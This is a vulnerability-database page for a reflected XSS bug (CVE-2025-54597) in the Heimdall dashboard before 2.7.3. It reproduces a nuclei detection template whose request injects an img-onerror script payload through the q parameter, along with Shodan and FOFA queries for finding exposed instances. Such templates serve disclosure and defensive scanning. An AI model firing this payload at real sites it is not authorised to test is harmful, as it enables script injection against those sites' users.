Lucene search
K

Heimdall Application Dashboard < 2.7.3 - Reflected XSS

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Reflected XSS in Heimdall before 2.7.3 allows remote script execution via crafted q parameter; update to 2.7.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2025-54597
27 Jul 202500:00
alpinelinux
Circl
CVE-2025-54597
31 Mar 202600:56
circl
CNNVD
Heimdall 跨站脚本漏洞
27 Jul 202500:00
cnnvd
CVE
CVE-2025-54597
27 Jul 202500:00
cve
Cvelist
CVE-2025-54597
27 Jul 202500:00
cvelist
EUVD
EUVD-2025-22806
3 Oct 202520:07
euvd
NVD
CVE-2025-54597
27 Jul 202503:15
nvd
Positive Technologies
PT-2025-30990
27 Jul 202500:00
ptsecurity
RedhatCVE
CVE-2025-54597
29 Jul 202500:12
redhatcve
Vulnrichment
CVE-2025-54597
27 Jul 202500:00
vulnrichment
Rows per page
id: CVE-2025-54597

info:
  name: Heimdall Application Dashboard < 2.7.3 - Reflected XSS
  author: 0x_Akoko
  severity: medium
  description: |
    LinuxServer.io Heimdall < 2.7.3 contains a stored XSS caused by improper sanitization of the \"q\" parameter, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially stealing session data or performing actions on behalf of users.
  remediation: |
    Update to version 2.7.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54597
    - https://github.com/linuxserver/Heimdall/releases/tag/v2.7.3
    - https://github.com/linuxserver/Heimdall/commit/6b9f61b0e672c37b807ff338e1a3fdaa8f39a8a6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-54597
    epss-score: 0.00565
    epss-percentile: 0.42694
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: linuxserver
    product: heimdall
    shodan-query: title:"Heimdall"
    fofa-query: app="Heimdall-Application-Dashboard"
  tags: cve,cve2025,heimdall,xss,reflected,linuxserver,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "heimdall"
          - "items/pintoggle"
        internal: true

  - raw:
      - |
        GET /?q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><img src=x onerror=alert(document.domain)>'
        part: body

      - type: status
        status:
          - 200
# digest: 490a00463044022025b64ac100451120cfc1544fe0b414f22264b189b469417951b09c0211ff5c1102205dae79388b3712aae94b1acdb1f8a5aa4c23c28b8589c2376d8d23f2345e5d99:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 00:56Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1 - 7.2
EPSS0.00565
SSVC
7